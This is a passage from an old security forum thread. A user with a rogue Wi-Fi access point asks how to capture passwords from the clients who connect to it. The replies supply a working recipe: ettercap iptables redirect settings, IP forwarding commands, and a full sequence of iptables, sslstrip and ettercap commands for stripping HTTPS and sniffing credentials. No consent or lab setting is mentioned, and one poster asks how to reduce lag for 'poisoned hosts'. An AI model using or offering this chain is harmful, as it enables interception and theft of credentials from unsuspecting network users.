Results 1 to 7 of 7

Thread: fake AP & ettercap MITM

Hybrid View

  1. #1
    Junior Member
    Join Date
    Jun 2009
    Posts
    47

    Default fake AP & ettercap MITM

    i have a fake access point set up forwarding traffic through me and to the internet.

    everythings works fine clients connect and get routed via my laptop running backtrack.

    however when i use ettercap to perfom an mitm attacked to capture passwords, the client are no longer able to access the internet via me.

    this will stay like this untill i set the forward ip tables again

    i dont understand?

  2. #2
    Junior Member Liuser's Avatar
    Join Date
    Apr 2010
    Posts
    58

    Default Re: fake AP & ettercap MITM

    I am not sure if you are using ettercap properly. Have you tested the same scenario on a local wired subnet? Does it work in the wired scenario?

    In experience, I find using ettercap and other MITM based attacks to be a bit kludgy on wireless. I end up DOSing victims often or dramatically decreasing their connectivity performance.
    Last edited by Liuser; 05-15-2010 at 11:25 PM. Reason: Formatting

  3. #3
    Junior Member
    Join Date
    Jun 2009
    Posts
    47

    Default Re: fake AP & ettercap MITM

    hi thanks for your reply,

    i have tested this on a wired network and it works fine, do you know of anyways i could get round this?

    my scenario is i have a COMPUTER connected to FAKAP connected to ME connected to the INTERNET

    so all the traffic is coming through me going to the internet. i want to be able to sniff passwords and any other information possible i have tried dsniff but couldn't get that to work. i am also a bit confused on what interface to sniff. i have interface eth0 connected to the COMPUTER and interface wlan0 connected to the INTERNET. i am assuming i would sniff the wlan0 interface because thats the traffic on the INTERNET

    any advice would be really appriciated thanks
    Last edited by roonie; 05-16-2010 at 11:07 AM.

  4. #4
    Junior Member creepykrawler's Avatar
    Join Date
    Jan 2010
    Location
    USA
    Posts
    56

    Default Re: fake AP & ettercap MITM

    Make sure the iptables section in /etc/etter.conf is uncommented.
    Code:
    # if you use iptables:
       redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    Also doesnt hurt to run this to after ettercap is running:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    "Failing to plan is planning to fail"

  5. #5
    Good friend of the forums gunrunr's Avatar
    Join Date
    Jan 2010
    Location
    shining my spoon
    Posts
    265

    Default Re: fake AP & ettercap MITM

    and running sslstrip might be a good idea too, that proggy rocks
    get the info here Moxie Marlinspike >> software >> sslstrip
    Wielder of the spoon of doom
    Summercon, Toorcon, Defcon, Bsides, Derbycon, Shmoocon oh my
    Come hang out with hackers on twitter @gunrunr556

  6. #6
    Junior Member
    Join Date
    Mar 2010
    Posts
    29

    Default Re: fake AP & ettercap MITM

    Code:
    # echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    python sslstrip.py -a
    ettercap -T -q -i at0

  7. #7
    Good friend of the forums gunrunr's Avatar
    Join Date
    Jan 2010
    Location
    shining my spoon
    Posts
    265

    Default Re: fake AP & ettercap MITM

    anyone know how to cut down the lag that poisoned hosts get?
    Wielder of the spoon of doom
    Summercon, Toorcon, Defcon, Bsides, Derbycon, Shmoocon oh my
    Come hang out with hackers on twitter @gunrunr556

Similar Threads

  1. [Video] Man In The Middle (MITM) Attack (ettercap, metasploit, sbd)
    By imported_g0tmi1k in forum OLD BT4 Videos
    Replies: 6
    Last Post: 01-16-2010, 08:47 PM
  2. MITM on TCP with ettercap.
    By n010n in forum OLD Newbie Area
    Replies: 1
    Last Post: 11-10-2009, 01:17 PM
  3. Problem with ettercap forwrding mitm & iptables
    By BlownCPU in forum OLD Pentesting
    Replies: 1
    Last Post: 04-30-2009, 10:11 PM
  4. Ettercap MITM
    By antihaxer in forum OLD Newbie Area
    Replies: 13
    Last Post: 07-09-2007, 06:40 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •